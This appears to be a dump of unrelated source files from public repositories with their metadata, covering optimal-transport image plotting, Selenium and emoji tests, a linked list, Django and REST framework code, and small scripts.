pl.tight_layout()
##############################################################################
# Instantiate the different transport algorithms and fit them
# -----------------------------------------------------------
# EMDTransport
ot_emd = ot.da.EMDTransport()
ot_emd.fit(Xs=Xs, Xt=Xt)
# SinkhornTransport
ot_sinkhorn = ot.da.SinkhornTransport(reg_e=1e-1)
ot_sinkhorn.fit(Xs=Xs, Xt=Xt)
# prediction between images (using out of sample prediction as in [6])
transp_Xs_emd = ot_emd.transform(Xs=X1)
transp_Xt_emd = ot_emd.inverse_transform(Xt=X2)
transp_Xs_sinkhorn = ot_sinkhorn.transform(Xs=X1)
transp_Xt_sinkhorn = ot_sinkhorn.inverse_transform(Xt=X2)
I1t = minmax(mat2im(transp_Xs_emd, I1.shape))
I2t = minmax(mat2im(transp_Xt_emd, I2.shape))
I1te = minmax(mat2im(transp_Xs_sinkhorn, I1.shape))
I2te = minmax(mat2im(transp_Xt_sinkhorn, I2.shape))
##############################################################################
# Plot new images
# ---------------
pl.figure(3, figsize=(8, 4))
pl.subplot(2, 3, 1)
pl.imshow(I1)
pl.axis('off')
pl.title('Image 1')
pl.subplot(2, 3, 2)
pl.imshow(I1t)
pl.axis('off')
pl.title('Image 1 Adapt')
pl.subplot(2, 3, 3)
pl.imshow(I1te)
pl.axis('off')
pl.title('Image 1 Adapt (reg)')
pl.subplot(2, 3, 4)
pl.imshow(I2)
pl.axis('off')
pl.title('Image 2')
pl.subplot(2, 3, 5)
pl.imshow(I2t)
pl.axis('off')
pl.title('Image 2 Adapt')
pl.subplot(2, 3, 6)
pl.imshow(I2te)
pl.axis('off')
pl.title('Image 2 Adapt (reg)')
pl.tight_layout()
pl.show()
|
[
"remi.flamary@gmail.com"
] |
remi.flamary@gmail.com
|
79a75243a32e6932c69c6870f42fc84cb351e1fd
|
037c66d0ed5453cadc4acd5f98283c74e37b0a01
|
/isl_converter/video_processing/__init__.py
|
d1d6b677241279236ac5e88eeeafb40b62a83f2f
|
[] |
no_license
|
eshandhawan51/isl_convertor
|
f85670c1d1ec9a21e0d43070fa2c418ab29e130f
|
6d1453c4c15188e85d0afd3fa5ebbf1fd9ff9024
|
refs/heads/master
| 2023-02-11T23:19:36.950134 | 2021-01-01T07:58:24 | 2021-01-01T07:58:24 | 297,278,500 | 0 | 1 | null | 2020-10-02T21:35:02 | 2020-09-21T08:36:51 |
Python
|
UTF-8
|
Python
| false | false | 175 |
py
|
from isl_converter.video_processing.video_capture import *
from isl_converter.video_processing.image_transformation import *
__all__=["video_capture","image_transformation"]
|
[
"eshandhawan51@gmail.com"
] |
eshandhawan51@gmail.com
|
e997c10457a55e2fbfa26f1c3303499cfccde220
|
4f1b754089bd2a2b1cd60589fc52d0f188076551
|
/venv/bin/rdfs2dot
|
bf83243a1c042c7174c78d82fb98ec165e2a115b
|
[] |
no_license
|
haroun3amri/happyMealSparQL
|
52fae5ccf6662393f2eb8d61ef4e226b36ce45bd
|
f5a350f51daf57aff83bf6e084b9192f4ca612d1
|
refs/heads/master
| 2020-04-26T08:49:54.409081 | 2019-03-02T11:27:37 | 2019-03-02T11:27:37 | 173,435,791 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 266 |
#!/home/haroun3amri/PycharmProjects/untitled/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from rdflib.tools.rdfs2dot import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"haroun3mari@gmail.com"
] |
haroun3mari@gmail.com
|
|
6f45e31cd38fe22467cfb6b9bef6d61c3073ffef
|
38c76d29799896a8335bd83b6220acd71d5d8bed
|
/pyeuler/p053.py
|
32ec8ddbb6ba17ace49313419244944a5c2dde50
|
[] |
no_license
|
oozk/pyeuler
|
c010505624bb95043883faa55a776d954c0496dc
|
74fd549985722f6d53a1394179d094a106c70689
|
refs/heads/master
| 2023-04-13T17:50:23.187918 | 2023-04-05T13:00:44 | 2023-04-05T13:00:44 | 261,848,886 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 373 |
py
|
#!/usr/bin/env python3
###
# Problem 53
# https://projecteuler.net/problem=53
###
from math import factorial
def p053(l):
factorials = dict((i, factorial(i)) for i in range(0, l+1))
n_choose_r = lambda n, r: factorials[n] / factorials[r] / factorials[n-r]
return sum(1 for n in range(1, l+1) for r in range(1, n) if n_choose_r(n, r) > 1e6)
print(p053(100))
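# Spot checks (added): C(23, 10) = 1144066 is the first binomial coefficient to
# exceed one million, so p053(22) == 0 and p053(23) == 4; the call above is
# expected to print 4075.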
|
[
"onur.ozkan.1@gmail.com"
] |
onur.ozkan.1@gmail.com
|
5622afa65eec464402bf0814aa5c5b61c5dcd50b
|
71cfd1b92d701bea50ae38a8b257520e99076275
|
/lecture_01/materials/sample_project/calculator/calc.py
|
65c791e8112430f1cbabaa25a679fd6dce98b1c8
|
[
"MIT"
] |
permissive
|
arisend/epam_python_autumn_2020
|
fb7c66b4cc2cadcea32886d9c4169620e9a1b606
|
bc33ee6a2b4fd9a5502d7848fcdbe93970b1aa73
|
refs/heads/main
| 2023-09-02T13:55:32.063553 | 2021-11-07T18:31:15 | 2021-11-07T18:31:15 | 425,582,862 | 0 | 0 |
MIT
| 2021-11-09T18:45:13 | 2021-11-07T18:24:22 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 73 |
py
|
def check_power_of_2(a: int) -> bool:
    # a & (a - 1) clears the lowest set bit, so it is zero only for powers of two;
    # the a > 0 guard excludes 0 (and negatives), which the bit trick alone misclassifies.
    return a > 0 and not (a & (a - 1))
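
# Examples (added): check_power_of_2(1) -> True, check_power_of_2(8) -> True,
# check_power_of_2(6) -> False, check_power_of_2(0) -> False.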
|
[
"noreply@github.com"
] |
arisend.noreply@github.com
|
f217503815d23e66672cf76af9e8978e96ded141
|
1b5a2cfc319f1e8ddc3462ded94301fb4df0d799
|
/fig/curve.py
|
0e502ac51026d025be1d0b7127a12e186996bcc6
|
[] |
no_license
|
AnnaKarusevich/EffZeemana
|
5fe651e07a59faa0f44db0c53ffb96f3d4c1fc17
|
9e7bea9a829601f200031615586e101a930dd1cb
|
refs/heads/master
| 2020-04-09T02:44:50.621501 | 2018-12-01T14:25:41 | 2018-12-01T14:25:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 856 |
py
|
import matplotlib.pyplot as plt
from functions import parsing
from math import pi
import numpy as np
plt.rc('text', usetex=True)
plt.rc('text.latex', unicode=True)
plt.rc('text.latex', preamble=[r'\usepackage[utf8x]{inputenc}',
r'\usepackage[russian]{babel}',
r'\usepackage{amsmath}',
r'\usepackage{amssymb}'])
plt.rc('font', family='serif')
def f(x):
    # double-exponential fit of the calibration data
    a = 6581
    b = 0.04164
    c = -7785
    d = -1.144
    return a * np.exp(b * x) + c * np.exp(d * x)
x = np.linspace(0.4, 2.4, 1000)
plt.plot(x, f(x), 'darkblue')
plt.xlabel(r'I, $\text{mA}$', fontsize='16')
plt.ylabel(r'H, $\text{Oe}$', fontsize='16')
plt.minorticks_on()
plt.grid(which='major', linestyle='-')
plt.grid(which='minor', linestyle=':')
plt.savefig('D:/Labs/zeeman/fig/curve.pdf')
plt.show()
|
[
"annapurna.kar@mail.ru"
] |
annapurna.kar@mail.ru
|
3db0026a1e823dd188e9c24493bc95b80f214f06
|
e8aaff29a076a12838115976d70fb44cb5778a97
|
/proj/pipelines.py
|
f2bb8940ed08348ebb820ed23b0efdfd40692b79
|
[] |
no_license
|
roycocup/scrappertests
|
76ce080a45e25f22005cc78bbbfb8257fe9ddc74
|
835c07a3fd8bc683c3b6788a3ce3e1a748316ea5
|
refs/heads/master
| 2022-12-10T15:06:03.596633 | 2020-09-11T20:23:44 | 2020-09-11T20:23:44 | 294,805,287 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 358 |
py
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
class ProjPipeline:
def process_item(self, item, spider):
return item
|
[
"rodrigo.pitta@gmail.com"
] |
rodrigo.pitta@gmail.com
|
bf4da77e6ed2f2440012c4f00d03d9e8f975a8c4
|
c77c09eecd35e4f0538a2bd170007ecdcc70405f
|
/examples/eonia_bootstrap.py
|
de6e6103fdeb1d1c598c10b11c54507260c659c7
|
[
"BSD-3-Clause"
] |
permissive
|
bill18/QuantLibExt
|
c0459646268f8248bda804e56ed8db26c2358c66
|
a6a1a23a2812830d9f32cd43e6a720913da5cb16
|
refs/heads/master
| 2020-06-26T18:54:11.142150 | 2019-08-10T11:26:07 | 2019-08-10T11:26:07 | 199,721,004 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,514 |
py
|
# Copyright (C) 2019 Wenhua Wang
#
# This file is part of QuantLibExt, which is an extension to the
# free-software/open-source quantitative library QuantLib - http://quantlib.org/
#
# QuantLibExt is free software: you can redistribute it and/or modify it
# under the terms of the BSD license.
#
# QuantLib's license is at <http://quantlib.org/license.shtml>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the license for more details.
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
import datetime
import ext.CurveBuilder as builder
# import ext.Config as config
import ext.CurveUtils as cutil
def plotCurve(dates, values, lineType='-', width=10, height=9):
pydt = [datetime.datetime(d.year(), d.month(), d.dayOfMonth())
for d in dates]
fig, ax = plt.subplots()
fig.set_size_inches(width, height)
ax.yaxis.set_major_formatter(
FuncFormatter(lambda r, pos: '{:.2%}'.format(r)))
plt.subplots_adjust(bottom=0.2)
l, = plt.plot(pydt, values, lineType)
plt.show()
if __name__ == '__main__':
asOfDate = 20121211
basis = 'Act/365F'
curve = builder.PiecewiseLogCubicDiscountCurve(
asOfDate, basis, 'eonia')
data = cutil.oneDayForwardRates(curve, '2Y', 'TGT', compounding='Simple')
dates = data['dates']
rates = data['rates']
plotCurve(dates, rates, '.')
|
[
"fin.hcny@gmail.com"
] |
fin.hcny@gmail.com
|
ecd2249faf1ca2634b98e90a4a525d713f473543
|
233297266196f9f249d7e4bace933785fe1c2691
|
/linked_lists/doubly_linked_list.py
|
40d21fd4bc1aab7cf802b33e365ea355731311ff
|
[
"MIT"
] |
permissive
|
a-churchill/miscellaneous-code
|
9f7d6527259d655c668da1b5c2c741acca111a92
|
cdb88783f39e1b9a89fdb12f7cddfe62619e4357
|
refs/heads/master
| 2021-10-10T18:16:51.449009 | 2019-01-15T05:34:30 | 2019-01-15T05:34:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,763 |
py
|
# structure of a node in a doubly linked list
class Node:
def __init__(self, val, next_node=None, prev_node=None):
"""
Node constructor, next and prev are optional
"""
self.val = val
self.next_node = next_node
self.prev_node = prev_node
def __str__(self):
nn = "None" if self.next_node is None else str(self.next_node.val)
pn = "None" if self.prev_node is None else str(self.prev_node.val)
return "(Value: {0}, Next: {1}, Prev: {2})".format(self.val, nn, pn)
class MyLinkedList:
def __init__(self):
"""
Initialize your data structure here.
"""
self.head = None
self.tail = None
self.length = 0
def get(self, index):
"""
Get the value of the index-th node in the linked list.
If the index is invalid, return -1.
:type index: int
:rtype: int
"""
current = self.getNodeAtIndex(index)
# print("Node retrieved: {0}".format(str(current)))
if current is None:
return -1
else:
return current.val
def addAtHead(self, val):
"""
Add a node of value val before the first element of the linked list.
After the insertion, the new node will be the first node
of the linked list.
:type val: int
:rtype: void
"""
new_head = Node(val, self.head, None)
if self.length == 0:
self.tail = new_head
else:
self.head.prev_node = new_head
self.head = new_head
self.length += 1
# print("Head: {0}".format(str(self.head)))
# print("addAtHead result: {0}".format(str(self)))
return
def addAtTail(self, val):
"""
Append a node of value val to the last element of the linked list.
:type val: int
:rtype: void
"""
new_tail = Node(val, None, self.tail)
if self.length == 0:
self.head = new_tail
else:
self.tail.next_node = new_tail
self.tail = new_tail
self.length += 1
# print("addAtTail result: {0}".format(str(self)))
return
def addAtIndex(self, index, val):
"""
Add a node of value val before the index-th node in the linked list.
If index equals to the length of linked list,
the node will be appended to the end of linked list.
If index is greater than the length, the node will not be inserted.
:type index: int
:type val: int
:rtype: void
"""
# if index is 0, add at head
if index == 0:
self.addAtHead(val)
return
elif index == self.length:
self.addAtTail(val)
return
current = self.getNodeAtIndex(index)
# current is set, now need to insert directly after it
if current is None:
return
current = current.prev_node
nn = Node(val, current.next_node, current)
current.next_node = nn
nn.next_node.prev_node = nn
self.length += 1
# print("addAtIndex result: {0}".format(str(self)))
return
def deleteAtIndex(self, index):
"""
Delete the index-th node in the linked list, if the index is valid.
:type index: int
:rtype: void
"""
# validate input
if index < 0:
return
elif index >= self.length:
return
# gets node to delete, updates references around it
to_del = self.getNodeAtIndex(index)
if to_del is None:
return
prevn = to_del.prev_node
nextn = to_del.next_node
if prevn is None: # to_del is the head
if nextn is None: # list only has 1 elem
self.head = None
self.tail = None
else:
self.head = nextn
nextn.prev_node = None
elif nextn is None: # to_del is the tail
self.tail = prevn
prevn.next_node = None
else: # to_del is in the middle of the list
prevn.next_node = nextn
nextn.prev_node = prevn
self.length -= 1
return
def getNodeAtIndex(self, index):
"""
Gets the node object at the given index
O(1) at the edges, approaches O(n) in the middle
(uses double sided nature)
:type index: int
:rtype: Node
"""
# check input
if index >= self.length:
return None
elif index < 0:
return None
# if element is closer to right side; better performance this way
if index > self.length // 2:
current = self.tail
for i in range(self.length - 1, index, -1):
                if current is None:
                    return None  # defensive: get() expects a Node or None, not -1
current = current.prev_node
# if element is closer to left side
else:
current = self.head
for i in range(index):
                if current is None:
                    return None  # defensive: get() expects a Node or None, not -1
current = current.next_node
return current
# defines string representation of list
def __str__(self):
result = []
current = self.head
while current is not None:
result.append(current.val)
current = current.next_node
return "MyLinkedList({0}, length {1})".format(str(result),
str(self.length))
# What is tested:
# obj = MyLinkedList()
# param_1 = obj.get(index)
# obj.addAtHead(val)
# obj.addAtTail(val)
# obj.addAtIndex(index,val)
# obj.deleteAtIndex(index)
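
# Minimal runnable demo (added; mirrors the commented API above):
if __name__ == "__main__":
    obj = MyLinkedList()
    obj.addAtHead(1)
    obj.addAtTail(3)
    obj.addAtIndex(1, 2)   # list is now 1 -> 2 -> 3
    print(obj.get(1))      # 2
    obj.deleteAtIndex(1)   # list is now 1 -> 3
    print(obj)             # MyLinkedList([1, 3], length 2)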
|
[
"chu.andrew.8@outlook.com"
] |
chu.andrew.8@outlook.com
|
873d1bcf8038fd8eba8a27027fd251e6cd57bec6
|
aa96174a0bc7d87dec082e6be810930d48c431c2
|
/test_case/test_youdao.py
|
12b57c6de78e88310f777cd9460c9c7176c85934
|
[] |
no_license
|
nicoleghuang/selenium_use_case
|
d1197b4674bf65e28905cd27e78e0ebb316532f4
|
c374e43097adc23689cdf6ce555b23208ffe16d4
|
refs/heads/master
| 2021-09-20T22:54:16.303331 | 2018-08-16T07:55:33 | 2018-08-16T07:55:33 | 106,635,838 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,629 |
py
|
#coding=utf-8
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
import unittest,time,re
import HTMLTestRunner
now=time.strftime("%Y-%m-%d %H-%M-%S",time.localtime())
#print now
class YouDao(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.base_url="http://www.youdao.com/"
self.verificationError=[]
self.accept_next_alert = True
def test_youdao_search(self):
u"""有道搜索用例"""
driver=self.driver
driver.get(self.base_url+"/")
try:
driver.find_element_by_id("qw").send_keys("viabtc")
driver.find_element_by_id("query").click()
time.sleep(5)
except:
driver.get_screenshot_as_file('D:\\selenium_use_case\\error_png\\'+now+'.png')
driver.close()
def tearDown(self):
self.driver.quit()
self.assertEqual([],self.verificationError)
if __name__=="__main__":
#HTMLTestRunner.main()
#unittest.main()
    testsuite = unittest.TestSuite()
    testsuite.addTest(YouDao("test_youdao_search"))
unittest.TextTestRunner().run(testsuite)
#filename='D:\\selenium_use_case\\report\\'+now+'_result.html'
#fp=file(filename,'wb')
#runner=HTMLTestRunner.HTMLTestRunner(stream=fp,title="test_report",description="this is the description of this report")
#runner.run(testsuite)
|
[
"noreply@github.com"
] |
nicoleghuang.noreply@github.com
|
d8a83a203ad3e39efa214b7786b7be640e6c5c2d
|
af192ea16aad4264a92039d594d72acca91d0e33
|
/tests/tests.py
|
d329884aa00948981f710044b18f363c5eea0ca8
|
[
"MIT"
] |
permissive
|
TakumiHQ/emoji-unicode
|
ceed81325829e2c44b6d1b04c4dbc7257cc95c86
|
85e8193f05f822641a58eb539b765481b084f83c
|
refs/heads/master
| 2021-01-18T16:08:52.817116 | 2015-11-20T13:10:44 | 2015-11-20T13:10:44 | 66,449,921 | 1 | 0 | null | 2016-08-24T09:17:27 | 2016-08-24T09:17:27 | null |
UTF-8
|
Python
| false | false | 6,812 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import logging
import os
import json
import io
from emoji_unicode import replace, normalize, Emoji
from emoji_unicode.utils import code_point_to_unicode, unicode_to_code_point
from emoji_unicode import data_parser
logging.disable(logging.CRITICAL)
DIR = os.path.dirname(__file__)
FIXTURES = os.path.join(DIR, 'fixtures')
EMOJI_PRETTY_JSON = None
def _get_emoji_pretty():
global EMOJI_PRETTY_JSON
if EMOJI_PRETTY_JSON is not None:
return EMOJI_PRETTY_JSON
with io.open(os.path.join(FIXTURES, 'emoji_pretty.json'), encoding='utf-8') as fh:
EMOJI_PRETTY_JSON = fh.read()
return EMOJI_PRETTY_JSON
def get_emoji_pretty():
return json.loads(_get_emoji_pretty())
def code_points_to_unicode(code_points):
return ''.join(
code_point_to_unicode(p)
for p in code_points.split('-')
)
def get_emojis(include_skin_variations=True, include_variations=True):
# todo: include variations (emoji + emo_variation), android doesn't use them, check iOS
emojis = []
for e in get_emoji_pretty():
emojis.append({
'unicode': code_points_to_unicode(e['unified']),
'code_point': e['unified'],
'short_name': e['short_name']
})
if include_skin_variations:
emojis.extend(
{
'unicode': code_points_to_unicode(point),
'code_point': point,
'short_name': e['short_name']
}
for point in e.get('skin_variations', {}).keys()
)
if include_variations:
emojis.extend(
{
'unicode': code_points_to_unicode(point),
'code_point': point,
'short_name': e['short_name']
}
for point in e.get('variations', [])
)
return emojis
def get_emojis_unicode(**kw):
return [e['unicode'] for e in get_emojis(**kw)]
class MetaTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_code_points_to_unicode(self):
self.assertEqual(
code_points_to_unicode('1F58B-1F58B-1F58B'),
'\U0001f58b\U0001f58b\U0001f58b'
)
def test_get_emojis(self):
self.assertEqual(len(get_emojis()), 1736)
self.assertEqual(len(get_emojis(include_skin_variations=False)), 1416)
self.assertEqual(len(get_emojis(include_variations=False)), 1619)
def test_get_emojis_unicode(self):
self.assertEqual(len(get_emojis_unicode()), 1736)
self.assertEqual(len(get_emojis_unicode(include_skin_variations=False)), 1416)
        self.assertEqual(len(get_emojis_unicode(include_variations=False)), 1619)
class UtilsTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_code_point_to_unicode(self):
self.assertEqual(
code_point_to_unicode('1F58B'),
'\U0001f58b'
)
def test_unicode_to_code_point(self):
self.assertEqual(
unicode_to_code_point('\U0001f58b'),
'1F58B'.lower()
)
class ModelEmojiTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_unicode(self):
emoji = Emoji(unicode='foo')
self.assertEqual(emoji.unicode, 'foo')
def test_code_points(self):
emoji = Emoji(unicode='\U0001f58b\U0001f58b\U0001f58b\uFE0F\u200D')
self.assertEqual(emoji.code_points, '1F58B-1F58B-1F58B'.lower())
def test_as_map(self):
emoji = Emoji(unicode='\U0001f58b\U0001f58b\U0001f58b\uFE0F\u200D')
self.assertEqual(
emoji.as_map(),
[('\U0001f58b', '1f58b'), ('\U0001f58b', '1f58b'), ('\U0001f58b', '1f58b')]
)
class ParserTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_replace(self):
"""
It should replace all emojis
"""
emojis = get_emojis()
        # Without spaces this would fail, because the Fitzpatrick tone is both a modifier and an emoji
txt = ' '.join(get_emojis_unicode())
txt_code_points = ' '.join(normalize(e['code_point']) for e in emojis)
res = replace(txt, lambda emoji: emoji.code_points)
self.assertEqual(res, txt_code_points)
def test_replace_with_no_fitz(self):
"""
It should replace no-spaced emojis, excluding fitzpatrick tone emojis
"""
emojis = get_emojis()
txt = ''.join(
e['unicode']
for e in emojis
if 'skin-tone' not in e['short_name']
)
txt_code_points = ''.join(
normalize(e['code_point'])
for e in emojis
if 'skin-tone' not in e['short_name']
)
res = replace(txt, lambda emoji: emoji.code_points)
self.assertEqual(res, txt_code_points)
def test_replace_remove(self):
txt = ''.join(get_emojis_unicode())
res = replace(txt, lambda emoji: '')
self.assertEqual(res, '')
def test_replace_digits(self):
"""
It should not match single digits
"""
txt = '#*0123456789'
res = replace(txt, lambda emoji: '')
self.assertEqual(res, txt)
def test_replace_text_variations(self):
"""
It should not match emojis with text variation
"""
txt = '\u203C\uFE0E'
res = replace(txt, lambda emoji: '')
self.assertEqual(res, txt)
def test_normalize(self):
self.assertEqual(normalize('00A900'), 'a900')
def test_normalize_variations(self):
self.assertEqual(normalize('00A9-FE0F-200D-F00'), 'a9-f00')
def test_normalize_separator(self):
self.assertEqual(normalize('00A9_FE0F_200D_F00', separator='_'), 'a9_f00')
class DataParserTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_parse(self):
res = set(data_parser.parse())
self.assertTrue('\u00A9' in res)
self.assertTrue('\u2194-\u2199' in res) # range
def test_read_template(self):
template = data_parser.read_template()
self.assertTrue('{{code_points}}' in template)
self.assertTrue('RE_PATTERN_TEMPLATE' in template)
def test_render_template(self):
code_points = data_parser.parse()
template = data_parser.read_template()
rendered_template = data_parser.render_template(template, code_points)
self.assertTrue('{{code_points}}' not in rendered_template)
self.assertTrue('RE_PATTERN_TEMPLATE' in rendered_template)
|
[
"ecastroborsani@gmail.com"
] |
ecastroborsani@gmail.com
|
81692c3527f89a21d770bcf0dfe69059814ffe59
|
64f5c0f229e1b1186f12d75b4ba21c07adfcf152
|
/index/models.py
|
fc2791e3989c627bacd03d10534b92d43824f717
|
[] |
no_license
|
Emehinola/intouch
|
22dd3a81c935956914362604b8fd60d6d7cd2a46
|
d370a48c21b93aed797c32a0621c3fa8bda89857
|
refs/heads/master
| 2023-01-24T22:37:41.862324 | 2020-12-13T08:54:55 | 2020-12-13T08:54:55 | 318,006,792 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
from django.db import models
# Create your models here.
# home page view, i.e. the survey views
class HomeViewCount(models.Model):
views = models.IntegerField(default=0) # number of views or visits
time = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-time']
verbose_name_plural = 'Views'
def __str__(self):
return f'{self.views}'
|
[
"emehinolasam01@gmail.com"
] |
emehinolasam01@gmail.com
|
c2e80a38a785c88209976e926fc65e085e4e529a
|
6ffd3ef2b5286348b9150141bdd5c1dcd1a24a7a
|
/seaqube/nlp/tools.py
|
fd96f685357633f9b9e925f35ed06d20974c5258
|
[
"MIT"
] |
permissive
|
bees4ever/seaqube
|
f08ea505ee2d360e358e507276de0d80e7b0dbb7
|
51bfe8f07574a7d5bf365c7e707646b59b623244
|
refs/heads/master
| 2023-02-26T23:40:09.143495 | 2021-01-28T19:08:04 | 2021-01-28T19:08:04 | 296,326,813 | 2 | 1 |
MIT
| 2021-01-15T12:08:25 | 2020-09-17T12:58:07 |
Python
|
UTF-8
|
Python
| false | false | 3,646 |
py
|
"""
Copyright (c) 2021 by Benjamin Manns
This file is part of the Semantic Quality Benchmark for Word Embeddings Tool in Python (SeaQuBe).
:author: Benjamin Manns
The nlp tool-kit which makes it possible to do text and doc loading, saving, processing in one-liners.
"""
import json
from collections import Counter
from copy import deepcopy
from collections import Iterable
from seaqube.nlp.types import SeaQuBeWordEmbeddingsModelGensim, BackgroundScheduler, SeaQuBeWordEmbeddingsModelC2V
from seaqube.package_config import log
from nltk import word_tokenize
from nltk.tokenize.treebank import TreebankWordDetokenizer
from progressbar import progressbar
anti_tokenizer = TreebankWordDetokenizer()
def word_count_list(double_list):
"""
Create a word count list of a corpus in doc format.
"""
word_count = Counter()
for sentence in double_list:
for token in sentence:
            word_count[token] += 1
return word_count
def gensim_we_model_to_custom_we_model(gensim_model):
return SeaQuBeWordEmbeddingsModelGensim(gensim_model)
def c2_we_model_to_custom_we_model(c2v_model):
return SeaQuBeWordEmbeddingsModelC2V(c2v_model)
class DelayedListToJSONWriter:
"""
@deprecated
Write buffer of corpus down, while not preserving gig's of text in RAM.
"""
def __init__(self, file_path, buffer_size=10):
self.path = file_path
self.buffer = []
self.buffer_size = buffer_size
self._in_write_mode = False
self.background_scheduler = BackgroundScheduler()
self.background_scheduler.start()
self.background_scheduler.local_scheduler.every(5).minutes.do(self.__save_on_disk)
def finalize(self):
log.debug(f"{self.__class__.__name__}: finalize is entered now")
self.background_scheduler.stop()
self.buffer_size = 0
self.__save_on_disk()
self.background_scheduler.join()
def __save_on_disk(self):
if not self._in_write_mode:
self._in_write_mode = True
log.debug("Check, save on disk")
data = []
if len(self.buffer) >= self.buffer_size:
buffer_copy = deepcopy(self.buffer)
self.buffer = []
## we make a fake json, but it is efficient
#if exists(self.path):
# data = load_json(self.path)
#data += self.buffer
#self.buffer = []
#save_json(data, self.path)
with open(self.path, "a") as f:
f.write(json.dumps(buffer_copy) + "\n")
log.debug("DelayedListToJSONWriter: write to file")
self._in_write_mode = False
def add(self, elem):
self.buffer.append(elem)
def tokenize_corpus(sentences: Iterable, verbose=True):
"""
Tokenize a list of texts.
"""
if verbose:
sentences = progressbar(sentences)
return [[token.lower() for token in word_tokenize(sentence) if token.isspace() is False] for sentence in sentences]
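# Usage sketch (added; assumes NLTK's 'punkt' tokenizer data is installed):
# tokenize_corpus(["Hello World!"], verbose=False) -> [['hello', 'world', '!']]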
def sentenceize_corpus(token_list: list, verbose=True):
"""
Reverse tokenization and transform a corpus again as a list of texts.
"""
if verbose:
token_list = progressbar(token_list)
return [anti_tokenizer.detokenize(tokens) for tokens in token_list]
def unique_2d_list(list_: list):
"""
Only keep those lists inside the big list which are unique.
Args:
list_: list of list where second dimension can contain duplicates
Returns:
"""
return list(map(lambda x: list(x), set(map(lambda x: tuple(x), list_))))
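# Example (added): unique_2d_list([[1, 2], [1, 2], [3]]) -> [[1, 2], [3]],
# in arbitrary order, since a set is used internally.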
|
[
"beesforever@gmx.de"
] |
beesforever@gmx.de
|
800d88fb5ae5695580acd4ab58b82b3d63b220d0
|
0cc4c5c6b309f40872d9d744fe1ab7aae9f6060f
|
/demo_chainmap.py
|
f3d00e0c8f8b639e7bd2fa7c81de832b9d38745f
|
[] |
no_license
|
Vigneshpandiyan600/Pythonfiles
|
aed22c7a2a9c47ee34d6b54cfc222b62e95de480
|
755ab463dc726b30204008cdcd58623fc8ec061e
|
refs/heads/master
| 2022-11-23T22:12:16.617346 | 2020-07-29T03:44:23 | 2020-07-29T03:44:23 | 283,381,135 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 236 |
py
|
from collections import ChainMap
dict1 = {'a':1, 'b':4}
dict2 = {'b':5, 'c':7}
cmap = ChainMap(dict1, dict2)
print(cmap)
for i in cmap.maps:
print(i)
for i in cmap.keys():
print(i)
for i in cmap.values():
print(i)
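# ChainMap searches its maps left to right, so for the duplicated key 'b'
# the value from dict1 wins:
print(cmap['b'])  # 4, not 5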
|
[
"noreply@github.com"
] |
Vigneshpandiyan600.noreply@github.com
|
5d0b9300f93e0f589d3e8b6b06b1dabd9844b08d
|
8a5ce1b7864881a516edabafa7b9388d27b53c6d
|
/music_app/views/artists.py
|
39c61cae6e109acb13ec4817bb28708f201c6d11
|
[
"MIT"
] |
permissive
|
ryzenboi98/music-app
|
84c4666624aad0c1f1f336f6c625491a0a606c4f
|
955417c1b4021bf1b757d55f7a1ec9d56a5596e2
|
refs/heads/main
| 2023-08-12T20:38:56.432150 | 2021-10-07T10:16:03 | 2021-10-07T10:16:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 521 |
py
|
from music_app.models import Artist
from rest_framework import viewsets, permissions
from music_app import serializers
class UserReadOnlyPermissions(permissions.BasePermission):
    # Safe (read-only) methods are open to everyone; writes require a superuser.
    def has_permission(self, request, view):
        return request.method in permissions.SAFE_METHODS or request.user.is_superuser
# Note: listing UserReadOnlyPermissions among the view's base classes has no
# effect in DRF; the check is enforced by permission_classes below.
class ArtistViewSet(viewsets.ModelViewSet, UserReadOnlyPermissions):
    permission_classes = [UserReadOnlyPermissions]
    queryset = Artist.objects.all()
    serializer_class = serializers.ArtistSerializer
|
[
"joaopro23@gmail.com"
] |
joaopro23@gmail.com
|
2372907ce176df44c3d9cbf02069995888b6c576
|
27694cb6497b948e9e6f6ce858cec6782adace01
|
/ciscosparkapi/api/webhooks.py
|
fedacf258a38092351d394b4f6a3c4605770a7a9
|
[
"MIT"
] |
permissive
|
marsivo/ciscosparkapi
|
780a087127f3c9c9c44707e4e4839eeae33a732b
|
f5ea6f4a8e1a9a90feb601ef3433c2dad7cd703f
|
refs/heads/master
| 2021-01-21T18:57:38.492342 | 2016-09-19T09:02:39 | 2016-09-19T09:02:39 | 68,586,837 | 0 | 0 | null | 2016-09-19T08:47:46 | 2016-09-19T08:47:46 | null |
UTF-8
|
